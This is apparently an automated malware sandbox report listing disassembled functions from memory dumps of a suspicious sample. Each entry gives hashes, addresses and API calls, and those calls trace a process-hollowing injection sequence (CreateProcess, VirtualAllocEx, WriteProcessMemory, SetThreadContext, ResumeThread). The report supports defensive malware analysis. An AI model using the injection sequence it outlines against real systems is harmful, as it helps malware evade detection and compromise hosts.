                                  • String ID: .@rl$Q($0$Z^9
                                  • API String ID: 0-2953857927
                                  • Opcode ID: f685cf1ad604db127af6e2b442835dfd45b20b0a521395838eb7c70e3f161549
                                  • Instruction ID: 78ebabf7054fcd6155bca284c57f5989fd27a195251317f796502f1d9d14910e
                                  • Opcode Fuzzy Hash: f685cf1ad604db127af6e2b442835dfd45b20b0a521395838eb7c70e3f161549
                                  • Instruction Fuzzy Hash: 1F33C1B4E052288FDB64DF24CD81BEDB7B2AB89304F5082E9951DA7390DB356E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .@rl$.@rl$d
                                  • API String ID: 0-497906446
                                  • Opcode ID: d777adf2e0eaa138e803f5e0267ba427c435e8322c70f4e68ec2f90f07610873
                                  • Instruction ID: 1cf99e7308c49f824cdcaa96f16bbb9535fb38aaa82ea4f5e7ccccda87a6fd4f
                                  • Opcode Fuzzy Hash: d777adf2e0eaa138e803f5e0267ba427c435e8322c70f4e68ec2f90f07610873
                                  • Instruction Fuzzy Hash: 20E15A78A002198FCB15CF58C9C09AAFBB6FF89314B15C665E815AB296C734EC41CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: fCrl$fCrl
                                  • API String ID: 0-1803420456
                                  • Opcode ID: b7c0c5b24357ca1aac69d544d497590b4b33600cc8c8788e8c8e7fbc48201166
                                  • Instruction ID: db6c1d3c9600ed230793e87aa5138c0e55f251a57a90b31428012a10cc55cce1
                                  • Opcode Fuzzy Hash: b7c0c5b24357ca1aac69d544d497590b4b33600cc8c8788e8c8e7fbc48201166
                                  • Instruction Fuzzy Hash: BB41D0347101048FD708EB74DA59B6E37E3ABC9304F25446CE502AB3E9CFB99C468B96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: fCrl$fCrl
                                  • API String ID: 0-1803420456
                                  • Opcode ID: ed6df8e7cba6cafd82ca2f5afb1e28da6c63090f0b4286a7c2007d2375e3b4c9
                                  • Instruction ID: 2619ab1d8a8408ad14afbdb248447fce28662d81434c55e177bf8fd7f7fd70e9
                                  • Opcode Fuzzy Hash: ed6df8e7cba6cafd82ca2f5afb1e28da6c63090f0b4286a7c2007d2375e3b4c9
                                  • Instruction Fuzzy Hash: 8241B2347141048FD708AB74DA59B6E36E3ABC9304F25442CE506AB3E9CFB5DD468B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007977DF
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 5948c3204b5d6d891ee816a855f5bb06baf99bd31d3c1daa987f93ad57735890
                                  • Instruction ID: c2b11ba09b66c2cde246f1ed2ef4e490d74f2500e77ae96f612ffcbbb1f0d214
                                  • Opcode Fuzzy Hash: 5948c3204b5d6d891ee816a855f5bb06baf99bd31d3c1daa987f93ad57735890
                                  • Instruction Fuzzy Hash: D9C14670D182298FDF24CFA8D841BEDBBB1BF49304F0095A9D949B7240EB749A85CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 802 797bfa-797c6b 804 797c6d-797c7f 802->804 805 797c82-797ce3 WriteProcessMemory 802->805 804->805 807 797cec-797d3e 805->807 808 797ce5-797ceb 805->808 808->807
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00797CD3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: eac6662cd0f675257da5dec244a4355981dd98abaa1185a4274a60d4748ac559
                                  • Instruction ID: 44b2c0713aec3bcb1e9664160e30d237daf52a33aaeb732ad7ee83cddddfe38a
                                  • Opcode Fuzzy Hash: eac6662cd0f675257da5dec244a4355981dd98abaa1185a4274a60d4748ac559
                                  • Instruction Fuzzy Hash: E541ABB5D052489FCF00CFA9E984AEEBBF1BF49304F14942AE814B7250D738AA45CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 813 797c00-797c6b 815 797c6d-797c7f 813->815 816 797c82-797ce3 WriteProcessMemory 813->816 815->816 818 797cec-797d3e 816->818 819 797ce5-797ceb 816->819 819->818
                                  APIs
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00797CD3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 9594f41d949a4c9696f68743b16c1ed3611cef305851dc53fafd15a2c6a7b6f3
                                  • Instruction ID: c410477578cb7da257063ad7ecc65db2c7097029325121f1db8e842a0cc84f6a
                                  • Opcode Fuzzy Hash: 9594f41d949a4c9696f68743b16c1ed3611cef305851dc53fafd15a2c6a7b6f3
                                  • Instruction Fuzzy Hash: 3A41BAB5D052489FCF00CFA9D984ADEFBF1BF49314F10942AE814B7240D738AA45CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 824 797e50-797f12 VirtualAllocEx 827 797f1b-797f65 824->827 828 797f14-797f1a 824->828 828->827
                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00797F02
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 7f807e5c2f7690b34a6b0f77d0881e44c415c6fd2be7032fcbe7369447e4ded1
                                  • Instruction ID: a9abd6a549c3b6d5c8846563a450a6e08973c7cbfeac800fcaf3c4c1ec9c706d
                                  • Opcode Fuzzy Hash: 7f807e5c2f7690b34a6b0f77d0881e44c415c6fd2be7032fcbe7369447e4ded1
                                  • Instruction Fuzzy Hash: 0041A8B9D042489FCF00CFA9E980AEEBBB1BB49314F10942AE815B7210D735A946CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 833 797e58-797f12 VirtualAllocEx 836 797f1b-797f65 833->836 837 797f14-797f1a 833->837 837->836
                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00797F02
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 07d4ee17eed6c25276f6959a77d2f474024706bec5df64513adcf082f8dc7872
                                  • Instruction ID: 549a131b211a3620ba1d3482acb642d076d6eae141f924c82ab45a5736758ed7
                                  • Opcode Fuzzy Hash: 07d4ee17eed6c25276f6959a77d2f474024706bec5df64513adcf082f8dc7872
                                  • Instruction Fuzzy Hash: D63187B9D042589FCF10CFA9E984AAEFBB1BB49314F10A42AE914B7310D735A945CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 842 7979a0-797a08 844 797a0a-797a1c 842->844 845 797a1f-797a67 Wow64SetThreadContext 842->845 844->845 847 797a69-797a6f 845->847 848 797a70-797abc 845->848 847->848
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00797A57
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 81f281a605a7860afd4cd840bc6023864b64d0ee024c0dff23d434f31c901741
                                  • Instruction ID: 251f94c79d716337f663d1106eb2c0ba9ed4e02eb2eda94cf21c94fc524ed3d8
                                  • Opcode Fuzzy Hash: 81f281a605a7860afd4cd840bc6023864b64d0ee024c0dff23d434f31c901741
                                  • Instruction Fuzzy Hash: 1A41DBB4D152489FDF04CFA9E884AEEBBF0BF49314F24842AE404B7240D738AA85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 853 7979a8-797a08 855 797a0a-797a1c 853->855 856 797a1f-797a67 Wow64SetThreadContext 853->856 855->856 858 797a69-797a6f 856->858 859 797a70-797abc 856->859 858->859
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00797A57
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 1a9343e957d08cbac0464317b83141f808fba8fe8e5416c7b26610188973c60b
                                  • Instruction ID: bd15feffb1030e75434c80d0ef4c0a840959344e82f99057d72dd45de14f00ec
                                  • Opcode Fuzzy Hash: 1a9343e957d08cbac0464317b83141f808fba8fe8e5416c7b26610188973c60b
                                  • Instruction Fuzzy Hash: 7D31CBB4D152589FDF04CFA9E984AEEBBB0AB49314F14842AE414B7240D738AA85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 864 797f71-798006 ResumeThread 867 798008-79800e 864->867 868 79800f-798051 864->868 867->868
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: b6a765a88c3ef6dce4e852ebecbd51a0e2a7cf033a46b68303100ce55cffa7bc
                                  • Instruction ID: 8effb8f93bf2407ff4117bfb2a43a1bc8d9e2ee94009a5f5a766f7ce47f92b68
                                  • Opcode Fuzzy Hash: b6a765a88c3ef6dce4e852ebecbd51a0e2a7cf033a46b68303100ce55cffa7bc
                                  • Instruction Fuzzy Hash: 5B31D8B4D052089FCF10CFA9E984AAEFBB0AF49314F20942AE814B7340CB39A945CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 873 797f78-798006 ResumeThread 876 798008-79800e 873->876 877 79800f-798051 873->877 876->877
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006904257.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_790000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: d28f536ae3908b40c5a4ddc3df0390436d03237efeacef4f90a8679337a0a9b0
                                  • Instruction ID: ce79962be4efbc3facc93d07bc263a3a2c3e15b89fc114a6e13fc9574490be63
                                  • Opcode Fuzzy Hash: d28f536ae3908b40c5a4ddc3df0390436d03237efeacef4f90a8679337a0a9b0
                                  • Instruction Fuzzy Hash: F531C8B4D052089FCF10CFA9E984A9EFBB4BF49314F10942AE814B7340DB39A945CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .@rl
                                  • API String ID: 0-1212071126
                                  • Opcode ID: 7fc22d68ba3a6c409e58e03444c14e08fc22cd77b7960fc8347282887b9bd954
                                  • Instruction ID: 620a749e87029c7257b411904067a0f11e1fb16d8181fda3160adfc7a6159140
                                  • Opcode Fuzzy Hash: 7fc22d68ba3a6c409e58e03444c14e08fc22cd77b7960fc8347282887b9bd954
                                  • Instruction Fuzzy Hash: 48419078A0070A9FC714CF64C585A6AFBF5FB86314F10C66AE52587691D730E985CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a32871cbc98fa7766509804c4b773ece157da84956e9c1c1302eb61ef7fc7b05
                                  • Instruction ID: 6966ace77ca9fadb77f8c4d2e8c8441f865626a81884deec1c90a1299a276811
                                  • Opcode Fuzzy Hash: a32871cbc98fa7766509804c4b773ece157da84956e9c1c1302eb61ef7fc7b05
                                  • Instruction Fuzzy Hash: FFD18D39E00219DFCB04DFA4D9409ADFBB2FF86314F158269D825AB7A5DB30AD45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 455e986da84de5b1a4eca7cae6fccc16f7c2820e9a02531fec4e4f5dc1335a61
                                  • Instruction ID: 9fbc0cd07d22841fb200e4af43dd784f94eb7a82c10c63b6b7a7fb4471976878
                                  • Opcode Fuzzy Hash: 455e986da84de5b1a4eca7cae6fccc16f7c2820e9a02531fec4e4f5dc1335a61
                                  • Instruction Fuzzy Hash: D661E178E01218DFDB18DFA5D944AAEBBB2BF4A304F208429E415BB390DB349946CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 403282d032ae88ce5ebdc6e8008748f95f4776772b158656a4aad82716ee9c2f
                                  • Instruction ID: c9a86f97768a0c69f0cfdf556d38109ce45af97f0edaf8ec93bdb975ae445843
                                  • Opcode Fuzzy Hash: 403282d032ae88ce5ebdc6e8008748f95f4776772b158656a4aad82716ee9c2f
                                  • Instruction Fuzzy Hash: 8161C279905265CFDB61EF54C948E8AF7B1BB0A315F4A82D4D509AB222C730DEC5CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ed720de9fcace502134632f814c3d557c7ddc8dba04be09cdc427c1737212659
                                  • Instruction ID: 70b51aae5a13e2ddf1b2fd7bf896d01a8722d15d781cad21ae5a2e055b749d6c
                                  • Opcode Fuzzy Hash: ed720de9fcace502134632f814c3d557c7ddc8dba04be09cdc427c1737212659
                                  • Instruction Fuzzy Hash: E351F378905269CFD764EF68C548A8AF7B1BB06315F4AC2D4D859AB212C730DEC1CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64e990b238e1597f6e7cb0d63b008f7538d7627d6c34bc79af8de470f1cbe8ba
                                  • Instruction ID: c0ab00ae5ac767c564b0e14fb840db73d526db1c52680e630e7d8d72dec450da
                                  • Opcode Fuzzy Hash: 64e990b238e1597f6e7cb0d63b008f7538d7627d6c34bc79af8de470f1cbe8ba
                                  • Instruction Fuzzy Hash: 63412534E082598FCB05DFA4C8549BEBBB1FF8A304F15849AD045AB3A2DB74AC45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84c42e955a9ece7dda9b2db7a39c7d7b54b3e1fb42cc2908f6a32db6dd461b3e
                                  • Instruction ID: 42b208727f43b720f520858cfb583f7c2c464ff31636222c1024160d060b9cd0
                                  • Opcode Fuzzy Hash: 84c42e955a9ece7dda9b2db7a39c7d7b54b3e1fb42cc2908f6a32db6dd461b3e
                                  • Instruction Fuzzy Hash: FE412878A05128CFD760EF68C944A4DFBB1BB46309F5A82D5E40997252C330EE81CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2cd043107bf8883bf2d08620c5ff65f6f212594fd3d124555e75d3293ea11e54
                                  • Instruction ID: 99db12c0a0baeed5c6ee2931e41b37f18a984a6990972d3b933259947b9cb942
                                  • Opcode Fuzzy Hash: 2cd043107bf8883bf2d08620c5ff65f6f212594fd3d124555e75d3293ea11e54
                                  • Instruction Fuzzy Hash: 4141F278904269CFDB60EFA8C588A8EF7B1BB06315F568294D418AB612C730DDC5CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006482750.000000000014D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0014D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_14d000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68c67e039a29ade8deef3486f4992e45053a0caee363f8dfeae088b7a3dcc219
                                  • Instruction ID: ce2533ba9c1a0c49626cb340a9b1b460380242e127ad3187af7053405c32d9ad
                                  • Opcode Fuzzy Hash: 68c67e039a29ade8deef3486f4992e45053a0caee363f8dfeae088b7a3dcc219
                                  • Instruction Fuzzy Hash: 53210475608344DFCF15DF20E884B26BBA5FB88318F30C5A9E9094B266C33AD847CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 97843902f97751c3d141890181d40542f69dc083fd04ec88661ee05a0d0e3cdd
                                  • Instruction ID: 968d704f73ab9a35f905be9844e853a310c4288b6979e3f3554d904017b4eb3f
                                  • Opcode Fuzzy Hash: 97843902f97751c3d141890181d40542f69dc083fd04ec88661ee05a0d0e3cdd
                                  • Instruction Fuzzy Hash: C63108B8A05268CFDB60DF58C944B8DFBF2BB46314F4681DAE509AB251C7309E84CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006482750.000000000014D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0014D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_14d000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ea8665f1c6e904147f2957f2aeedbceabfc546b63af0bd92b367267b6e8c2f9
                                  • Instruction ID: 9317fb158c049e0c5bd34ba62ac813ba1452404920b56980b3a986b7cdb67dcf
                                  • Opcode Fuzzy Hash: 9ea8665f1c6e904147f2957f2aeedbceabfc546b63af0bd92b367267b6e8c2f9
                                  • Instruction Fuzzy Hash: DC2162755083809FCB02CF14E994715BF71EB46314F28C5EAD8458B267C33AD856CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f60c2b775c80409b203236b119710fde033fd1ec5b017b485d1514d116d81db
                                  • Instruction ID: 91026b3dd4be9f9f88caf06645f5943dba81b6f870b7f30fc8abed93d480c77e
                                  • Opcode Fuzzy Hash: 6f60c2b775c80409b203236b119710fde033fd1ec5b017b485d1514d116d81db
                                  • Instruction Fuzzy Hash: ACF024A9D0D2405FC7059F785C163A5BFA0AB17301F4440EBE401D7662E7308606C722
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63b5bc0791500df09c788d1099584d009d29d8d28ce3608d80f222ec45f014b7
                                  • Instruction ID: ef298e4d13dc68109542053f1cf52fed2761b41a437268abf928f8006a798230
                                  • Opcode Fuzzy Hash: 63b5bc0791500df09c788d1099584d009d29d8d28ce3608d80f222ec45f014b7
                                  • Instruction Fuzzy Hash: 23F0676950D2D04FD32787B49D699613F20AB27345B0A02CAD0C6DB8F3D268980ACB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f4e78e4be11d7c51570e774119c36df6ae3d244d6444d476dab881426203cac
                                  • Instruction ID: 32a71372fa92fa29b4e4781ef7e23c27ac7d1394bc45de611b71af512164ca0e
                                  • Opcode Fuzzy Hash: 9f4e78e4be11d7c51570e774119c36df6ae3d244d6444d476dab881426203cac
                                  • Instruction Fuzzy Hash: 88F0A837014244AFCB068F80DC44D987FBAFF4A300B0A80E2EA488F132D332E664EB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d448c8d9763c0988038f19e7bb7168673b8fdce2bfef07fb52793ed6c7752c1f
                                  • Instruction ID: f81a3284adf5ee5a0b38d1317ec1ceb19777ac39294729ed149d7dbf541a6693
                                  • Opcode Fuzzy Hash: d448c8d9763c0988038f19e7bb7168673b8fdce2bfef07fb52793ed6c7752c1f
                                  • Instruction Fuzzy Hash: 55E08C1624E6E41E8B1B63B414235AE2F610E5611430A04AED14A9B2E3CB4D0E4A83B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1006510537.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1a0000_jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b2d2afdf8cc5b7ccea18ced03ba7a08bcfe8e2e892637580233587e30185cdd
